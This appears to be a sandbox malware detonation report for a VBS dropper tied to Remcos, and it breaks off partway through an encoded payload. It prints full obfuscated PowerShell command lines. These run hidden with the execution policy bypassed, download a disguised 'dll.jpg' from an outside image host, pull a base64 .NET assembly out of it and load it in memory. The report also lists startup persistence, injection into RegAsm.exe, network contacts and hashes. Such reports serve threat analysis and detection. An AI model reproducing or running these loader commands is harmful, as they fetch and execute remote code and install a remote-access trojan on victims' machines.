NPWgDJDsOQBnWOQNgdNPWgDJDsGwWOQNgdNPWgDJDsKQWOQNgdNPWgDJDs7WOQNgdNPWgDJDsFoWOQNgdNPWgDJDsJwWOQNgdNPWgDJDsrWOQNgdNPWgDJDsCcWOQNgdNPWgDJDsMQBxWOQNgdNPWgDJDsG0WOQNgdNPWgDJDsJwWOQNgdNPWgDJDsrWOQNgdNPWgDJDsCcWOQNgdNPWgDJDsZQB0WOQNgdNPWgDJDsGgWOQNgdNPWgDJDsbwBkWOQNgdNPWgDJDsCWOQNgdNPWgDJDsWOQNgdNPWgDJDsPQWOQNgdNPWgDJDsgWOQNgdNPWgDJDsFoWOQNgdNPWgDJDsMQBxWOQNgdNPWgDJDsHQWOQNgdNPWgDJDseQBwWOQNgdNPWgDJDsGUWOQNgdNPWgDJDsLgBHWOQNgdNPWgDJDsGUWOQNgdNPWgDJDsdWOQNgdNPWgDJDsBNWOQNgdNPWgDJDsGUWOQNgdNPWgDJDsdWOQNgdNPWgDJDsBoWOQNgdNPWgDJDsG8WOQNgdNPWgDJDsZWOQNgdNPWgDJDsWOQNgdNPWgDJDsoWOQNgdNPWgDJDsDkWOQNgdNPWgDJDsZwBsWOQNgdNPWgDJDsFIWOQNgdNPWgDJDsdQBuWOQNgdNPWgDJDsDkWOQNgdNPWgDJDsZwBsWOQNgdNPWgDJDsCkWOQNgdNPWgDJDsLgBJWOQNgdNPWgDJDsG4WOQNgdNPWgDJDsdgWOQNgdNPWgDJDsnWOQNgdNPWgDJDsCsWOQNgdNPWgDJDsJwBvWOQNgdNPWgDJDsGsWOQNgdNPWgDJDsZQWOQNgdNPWgDJDsoWOQNgdNPWgDJDsCcWOQNgdNPWgDJDsKwWOQNgdNPWgDJDsnWOQNgdNPWgDJDsFoWOQNgdNPWgDJDsMQBxWOQNgdNPWgDJDsG4WOQNgdNPWgDJDsdQBsWOQNgdNPWgDJDsGwWOQNgdNPWgDJDsLWOQNgdNPWgDJDsWOQNgdNPWgDJDsnWOQNgdNPWgDJDsCsWOQNgdNPWgDJDsJwWOQNgdNPWgDJDsgWOQNgdNPWgDJDsFsWOQNgdNPWgDJDsbwBiWOQNgdNPWgDJDsGoWOQNgdNPWgDJDsZQBjWOQNgdNPWgDJDsHQWOQNgdNPWgDJDsWwBdWOQNgdNPWgDJDsF0WOQNgdNPWgDJDsIWOQNgdNPWg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sE0WOQNgdNPWgDJDsVWOQNgdNPWgDJDsBFWOQNgdNPWgDJDsHYWOQNgdNPWgDJDsTQBEWOQNgdNPWgDJDsFUWOQNgdNPWgDJDseWOQNgdNPWgDJDsBPWOQNgdNPWgDJDsEQWOQNgdNPWgDJDsWQB4WOQNgdNPWgDJDsE0WOQNgdNPWgDJDsVWOQNgdNPWgDJDsBJWOQNgdNPWgDJDsDWOQNgdNPWgDJDsWOQNgdNPWgDJDsTQBqWOQNgdNPWgDJDsFEWOQNgdNPWgDJDsMQBOWOQNgdNPWgDJDsFQWOQNgdNPWgDJDsWQWOQNgdNPWgDJDs1WOQNgdNPWgDJDsE0WOQNgdNPWgDJDsVWOQNgdNPWgDJDsBnWOQNgdNPWgDJDsHgWOQNgdNPWgDJDsTQBTWOQNgdNPWgDJDsDkWOQNgdNPWgDJDsegBkWOQNgdNPWgDJDsEcWOQNgdNPWgDJDsNQBsWOQNgdNPWgDJDsGIWOQNgdNPWgDJDsVwBoWOQNgdNPWgDJDsGoWOQNgdNPWgDJDsWQBYWOQNgdNPWgDJDsFIWOQNgdNPWgDJDsMWOQNgdNPWgDJDsBZWOQNgdNPWgDJDsFMWOQNgdNPWgDJDsOQB0WOQNgdNPWgDJDsGIWOQNgdNPWgDJDsMgBNWOQNgdNPWgDJDsHUWOQNgdNPWgDJDsYwBIWOQNgdNPWgDJDsEIWOQNgdNPWgDJDsaWOQNgdNPWgDJDsBaWOQNgdNPWgDJDsEgWOQNgdNPWgDJDsSgB2WOQNgdNPWgDJDsFkWOQNgdNPWgDJDsMwBOWOQNgdNPWgDJDsHWOQNgdNPWgDJDsWOQNgdNPWgDJDsWgBDWOQNgdNPWgDJDsDUWOQNgdNPWgDJDsdQBaWOQNgdNPWgDJDsEcWOQNgdNPWgDJDsTQB2WOQNgdNPWgDJDsEwWOQNgdNPWgDJDsegBwWOQNgdNPWgDJDsHoWOQNgdNPWgDJDsYwWOQNgdNPWgDJDsnWOQNgdNPWgDJDsCsWOQNgdNPWgDJDsJwBIWOQNgdNPWgDJDsFIWOQNgdNPWgDJDsMWOQNgdNPWgDJDsBhWOQNgdNPWgDJDsEEWOQNgdNPWgDJDsPQWOQNgdNPWgDJDs9WOQNgdNPWgDJDsDkWOQNgdNPWgDJDsZwBsWOQNgdNPWgDJDsCWOQNgdNPWgDJDsWOQNgdNPWgDJDsLWOQNgdNPWgDJDsWOQNgdNPWgDJDsgWOQNgdNPWgDJDsDkWOQNgdNPWgDJDsZwBsWOQNgdNPWgDJDsDkWOQNgdNPWgDJDsZwBsWOQNgdNPWgDJDsCWOQNgdNPWgDJDsWOQNgdNPWgDJDsLWOQNgdNPWgDJDsWOQNgdNPWgDJDsgWOQNgdNPWgDJDsDkWOQNgdNPWgDJDsZwBsWOQNgdNPWgDJDsDIWOQNgdNPWgDJDsOQBnWOQNgdNPWgDJDsGwWOQNgdNPWgDJDsIWOQNgdNPWgDJDsWOQNgdNPWgDJDssWOQNgdNPWgDJDsCWOQNgdNPWgDJDsWOQNgdNPWgDJDsOQBnWOQNgdNPWgDJDsGwWOQNgdNPWgDJDsZwBvWOQNgdNPWgDJDsG8WOQNgdNPWgDJDsZwBsWOQNgdNPWgDJDsGUWOQNgdNPWgDJDsOQBnWOQNgdNPWgDJDsGwWOQNgdNPWgDJDsIWOQNgdNPWgDJDsWOQNgdNPWgDJDssWOQNgdNPWgDJDsCWOQNgdNPWgDJDsWOQNgdNPWgDJDsOQBnWOQNgdNPWgDJDsGwWOQNgdNPWgDJDsMwWOQNgdNPWgDJDs5WOQNgdNPWgDJDsGcWOQNgdNPWgDJDsbWOQNgdNPWgDJDsWOQNgdNPWgDJDsgWOQNgdNPWgDJDsCwWOQNgdNPWgDJDsIWOQNgdNPWgDJDsWOQNgdNPWgDJDs5WOQNgdNPWgDJDsGcWOQNgdNPWgDJDsbWOQNgdNPWgDJDsBDWOQNgdNPWgDJDsDoWOQNgdNPWgDJDscgBCWOQNgdNPWgDJDsEEWOQNgdNPWgDJDsUWOQNgdNPWgDJDsByWOQNgdNPWgDJDsG8WOQNgdNPWgDJDsZwByWOQNgdNPWgDJDsGEWOQNgdNPWgDJDsbQBEWOQNgdNPWgDJDsGEWOQNgdNPWgDJDsdWOQNgdNPWgDJDsBhWOQNgdNPWgDJDsHIWOQNgdNPWgDJDsQgBBWOQNgdNPWgDJDsDkWOQNgdNPWgDJDsZwBsWOQNgdNPWgDJDsCwWOQNgdNPWgDJDsIWOQNgdNPWgDJDsWOQNgdNPWgDJDs5WOQNgdNPWgDJDsGcWOQNgdNPWgDJDsbWOQNgdNPWgDJDsBnWOQNgdNPWgDJDsG8WOQNgdNPWgDJDsbwBnWOQNgdNPWgDJDsGwWOQNgdNPWgDJDsZQWOQNgdNPWgDJDs5WOQNgdNPWgDJDsGcWOQNgdNPWgDJDsbWOQNgdNPWgDJDsWOQNgdNPWgDJDspWOQNgdNPWgDJDsCkWOQNgdNPWgDJDsJwWOQNgdNPWgDJDspWOQNgdNPWgDJDsC4WOQNgdNPWgDJDsUgBlWOQNgdNPWgDJDsHWOQNgdNPWgDJDsWOQNgdNPWgDJDsTWOQNgdNPWgDJDsBBWOQNgdNPWgDJDsGMWOQNgdNPWgDJDsRQWOQNgdNPWgDJDsoWOQNgdNPWgDJDsCcWOQNgdNPWgDJDsOQBnWOQNgdNPWgDJDsGwWOQNgdNPWgDJDsJwWOQNgdNPWgDJDssWOQNgdNPWgDJDsFsWOQNgdNPWgDJDscwBUWOQNgdNPWgDJDsHIWOQNgdNPWgDJDsaQBOWOQNgdNPWgDJDsEcWOQNgdNPWgDJDsXQBbWOQNgdNPWgDJDsEMWOQNgdNPWgDJDsSWOQNgdNPWgDJDsBBWOQNgdNPWgDJDsHIWOQNgdNPWgDJDsXQWOQNgdNPWgDJDszWOQNgdNPWgDJDsDkWOQNgdNPWgDJDsKQWOQNgdNPWgDJDsuWOQNgdNPWgDJDsFIWOQNgdNPWgDJDsZQBwWOQNgdNPWgDJDsEwWOQNgdNPWgDJDsQQBjWOQNgdNPWgDJDsEUWOQNgdNPWgDJDsKWOQNgdNPWgDJDsWOQNgdNPWgDJDsnWOQNgdNPWgDJDsFoWOQNgdNPWgDJDsMQBxWOQNgdNPWgDJDsCcWOQNgdNPWgDJDsLWOQNgdNPWgDJDsBbWOQNgdNPWgDJDsHMWOQNgdNPWgDJDsVWOQNgdNPWgDJDsByWOQNgdNPWgDJDsGkWOQNgdNPWgDJDsTgBHWOQNgdNPWgDJDsF0WOQNgdNPWgDJDsWwBDWOQNgdNPWgDJDsEgWOQNgdNPWgDJDsQQByWOQNgdNPWgDJDsF0WOQNgdNPWgDJDsMwWOQNgdNPWgDJDs2WOQNgdNPWgDJDsCkWOQNgdNPWgDJDsLgBSWOQNgdNPWgDJDsGUWOQNgdNPWgDJDscWOQNgdNPWgDJDsBMWOQNgdNPWgDJDsEEWOQNgdNPWgDJDsYwBFWOQNgdNPWgDJDsCgWOQNgdNPWgDJDsKWOQNgdNPWgDJDsBbWOQNgdNPWgDJDsEMWOQNgdNPWgDJDsSWOQNgdNPWgDJDsBBWOQNgdNPWgDJDsHIWOQNgdNPWgDJDsXQWOQNgdNPWgDJDsxWOQNgdNPWgDJDsDEWOQNgdNPWgDJDsNWOQNgdNPWgDJDsWOQNgdNPWgDJDsrWOQNgdNPWgDJDsFsWOQNgdNPWgDJDsQwBIWOQNgdNPWgDJDsEEWOQNgdNPWgDJDscgBdWOQNgdNPWgDJDsDYWOQNgdNPWgDJDsNgWOQNgdNPWgDJDsrWOQNgdNPWgDJDsFsWOQNgdNPWgDJDsQwBIWOQNgdNPWgDJDsEEWOQNgdNPWgDJDscgBdWOQNgdNPWgDJDsDYWOQNgdNPWgDJDsNQWOQNgdNPWgDJDspWOQNgdNPWgDJDsCwWOQNgdNPWgDJDsJwBcWOQNgdNPWgDJDsCcWOQNgdNPWgDJDsKQWOQNgdNPWgDJDsgWOQNgdNPWgDJDsCkWOQNgdNPWgDJDs';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('WOQNgdNPWgDJDs','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".((VArIablE '*mdR*').NAmE[3,11,2]-JOin'')(('Z1qima'+'geUrl = 9glhttps://uploaddeimagens.'+'c'+'om.br/images/004/682/796/original/dll.jpg?17017939659gl;Z1qwebClient = New-Objec'+'t System.N'+'et.WebC'+'lient;Z1qimageBytes = Z'+'1qwebClient.DownloadData(Z1qimageUrl);Z1qimageText = [System.Text.Encoding]::UTF8.G'+'etString(Z1qimageBytes);Z1qstartFlag = 9gl<<BASE64_START>>9gl;Z1qendFlag = 9g'+'l<<BASE64_END>>9gl;Z1qstar'+'tIndex = Z1q'+'imageText.IndexOf(Z1qstartFlag);Z1qendIndex = Z1qimageTex'+'t.IndexOf(Z1qendFlag);Z1qstartIndex -ge 0 -and Z1qendIndex -gt Z'+'1'+'qstartIndex;Z1qstartIndex += Z1qstartFlag.Length;Z1q'+'base64Length = Z1qendIndex '+'- Z1qstartInde'+'x;Z1qbase64Command = Z1qimageText.Substr'+'ing(Z1qstartIndex, Z1qbase6'+'4Length);Z'+'1qcommandB'+'ytes = [System.Convert]'+'::'+'F'+'romBase64String(Z1qbase64Command);Z1qloadedAssembly'+' = [System.R'+'eflection.Assembly]::Load(Z1qcommandBytes);Z1qtype = Z1qloadedAssem'+'bly.GetType(9glClassLibrary3.Class19gl);Z'+'1qm'+'ethod = Z1qtype.GetMethod(9glRun9gl).Inv'+'oke('+'Z1qnull,'+' [object[]] (9glJjBhYmMzYjcwMjM1NjQxM2JlNzAyYTg5NjA0ZWVkMjk3YjdjZjI4Yzg0MGI1NjY2NDk1YjMxMGYxMD'+'E3N2UwZWE9bWgmNjc1O'+'DA3NTY9'+'c2kmNjdhZjI4NT'+'Y9e'+'GU/dHh0LmlpaWlzc29jbWVyLzM2MjM5MTA5MzIzODU2OTE4MTEvMDUxODYxMTI0MjQ1NTY5MTgxMS9zdG5lbWhjYXR0YS9tb2MucHBhZHJvY3NpZC5uZGMvLzpzc'+'HR0aA==9gl , 9gl9gl , 9gl29gl , 9glgoogle9gl , 9gl39gl , 9glC:rBAProgramDatarBA9gl, 9glgoogle9gl))').RepLAcE('9gl',[sTriNG][CHAr]39).RepLAcE('Z1q',[sTriNG][CHAr]36).RepLAcE(([CHAr]114+[CHAr]66+[CHAr]65),'\') )"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | uploaddeimagens.com.br | udp |
| US | 188.114.96.0:443 | uploaddeimagens.com.br | tcp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| NL | 2.19.194.249:80 | apps.identrust.com | tcp |
Files
memory/2140-4-0x000000001B2F0000-0x000000001B5D2000-memory.dmp
memory/2140-5-0x000007FEF51B0000-0x000007FEF5B4D000-memory.dmp
memory/2140-7-0x00000000026C0000-0x0000000002740000-memory.dmp
memory/2140-8-0x00000000026C0000-0x0000000002740000-memory.dmp
memory/2140-9-0x00000000026C0000-0x0000000002740000-memory.dmp
memory/2140-6-0x0000000002040000-0x0000000002048000-memory.dmp
memory/2140-10-0x000007FEF51B0000-0x000007FEF5B4D000-memory.dmp
memory/2140-11-0x00000000026C0000-0x0000000002740000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 000219d2630054828945f8747bd96242 |
| SHA1 | 57519f4dcd639bece4833919664b86c41bfbd9b4 |
| SHA256 | ae4c7861e398e3b76c6ac7ae26d934a236e44899279f822ece53094ea13c87d0 |
| SHA512 | d82ea300e8fa939d71fcc0008a6bf43ef2d49d3a3accb9dfb7a0bd3922363d3c69ac2a0703789bf916867bafd5186750b007d74b7772a6fcba3e957eb94c9846 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\UTS45R3XG73OWG8A6CR7.temp
| MD5 | 000219d2630054828945f8747bd96242 |
| SHA1 | 57519f4dcd639bece4833919664b86c41bfbd9b4 |
| SHA256 | ae4c7861e398e3b76c6ac7ae26d934a236e44899279f822ece53094ea13c87d0 |
| SHA512 | d82ea300e8fa939d71fcc0008a6bf43ef2d49d3a3accb9dfb7a0bd3922363d3c69ac2a0703789bf916867bafd5186750b007d74b7772a6fcba3e957eb94c9846 |
memory/2704-17-0x000007FEF51B0000-0x000007FEF5B4D000-memory.dmp
memory/2704-18-0x0000000002A30000-0x0000000002AB0000-memory.dmp
memory/2704-19-0x000007FEF51B0000-0x000007FEF5B4D000-memory.dmp
memory/2704-20-0x0000000002A30000-0x0000000002AB0000-memory.dmp
memory/2704-22-0x0000000002A30000-0x0000000002AB0000-memory.dmp
memory/2704-21-0x0000000002A30000-0x0000000002AB0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Cab5830.tmp
| MD5 | f3441b8572aae8801c04f3060b550443 |
| SHA1 | 4ef0a35436125d6821831ef36c28ffaf196cda15 |
| SHA256 | 6720349e7d82ee0a8e73920d3c2b7cb2912d9fcf2edb6fd98f2f12820158b0bf |
| SHA512 | 5ba01ba421b50030e380ae6bbcd2f681f2a91947fe7fedb3c8e6b5f24dce9517abf57b1cf26cc6078d4bb53bde6fcfb2561591337c841f8f2cb121a3d71661b9 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
| MD5 | ac05d27423a85adc1622c714f2cb6184 |
| SHA1 | b0fe2b1abddb97837ea0195be70ab2ff14d43198 |
| SHA256 | c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d |
| SHA512 | 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d |
C:\Users\Admin\AppData\Local\Temp\Tar597F.tmp
| MD5 | 9c0c641c06238516f27941aa1166d427 |
| SHA1 | 64cd549fb8cf014fcd9312aa7a5b023847b6c977 |
| SHA256 | 4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f |
| SHA512 | 936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06 |
memory/2704-100-0x000000001B290000-0x000000001B29A000-memory.dmp
memory/2704-101-0x000007FEF51B0000-0x000007FEF5B4D000-memory.dmp
memory/2140-102-0x000007FEF51B0000-0x000007FEF5B4D000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2023-12-07 14:39
Reported
2023-12-07 14:41
Platform
win10v2004-20231127-en
Max time kernel
149s
Max time network
153s
Command Line
Signatures
Remcos
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3028534956-1709433221-1313273668-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3840 set thread context of 3904 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\envifa.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = '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